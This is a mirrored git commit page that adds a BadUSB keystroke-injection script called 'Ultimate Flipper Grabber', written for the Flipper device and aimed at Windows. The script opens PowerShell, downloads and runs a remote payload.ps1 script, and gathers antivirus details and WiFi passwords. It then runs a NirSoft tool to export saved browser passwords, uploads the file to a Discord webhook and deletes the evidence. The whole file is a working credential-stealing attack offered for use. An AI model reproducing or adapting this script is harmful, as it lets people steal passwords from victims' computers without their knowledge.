mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Create Grabber-Discord_Webhook.txt
Extract antivirus, wifi and browser passwords to a discord webhook. (and history browser later) repo of ps1 code : https://github.com/blobs0/Ultimate-Flipper-Grabber
This commit is contained in:
parent
4a2f69fc06
commit
4bb028a404
48
BadUSB/Grabber-Discord_Webhook.txt
Normal file
48
BadUSB/Grabber-Discord_Webhook.txt
Normal file
@ -0,0 +1,48 @@
|
||||
REM Title: Ultimate Flipper Grabber
|
||||
REM Author: blobs0 (https://github.com/blobs0/Ultimate-Flipper-Grabber)
|
||||
REM Credit Discord webhooks functions :I-am-jakoby
|
||||
REM Credit Wifi grabber : 7h30th3r0n3 and the0bone
|
||||
REM Credit Password Nirsoft : moosehadley
|
||||
REM Target: Windows 10/11 (7/8 not tested)
|
||||
REM Supported Layout keyboard: US/FR/DE
|
||||
REM Version: 1.1
|
||||
REM Category: Grabber
|
||||
REM Extrait l'antivirus, les mots de passe wifi et de navigateur vers un webhook discord.
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
REM edit your webhook here
|
||||
STRING $DiscordUrl = 'Your-Discord-Webhook'
|
||||
ENTER
|
||||
STRING iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/blobs0/Ultimate-Flipper-Grabber/main/payload.ps1'))
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING version-av
|
||||
ENTER
|
||||
STRING Wifi
|
||||
ENTER
|
||||
STRING Get-Nirsoft
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING wbpv28821@
|
||||
ENTER
|
||||
STRING .\WebBrowserPassView.exe
|
||||
ENTER
|
||||
DELAY 3000
|
||||
CTRL A
|
||||
CTRL S
|
||||
DELAY 1000
|
||||
STRING export
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 800
|
||||
STRING Upload-Discord -file "C:\temp\export.txt" -text "Browser password :"
|
||||
ENTER
|
||||
STRING Del-Nirsoft-File
|
||||
ENTER
|
||||
STRING EXIT
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user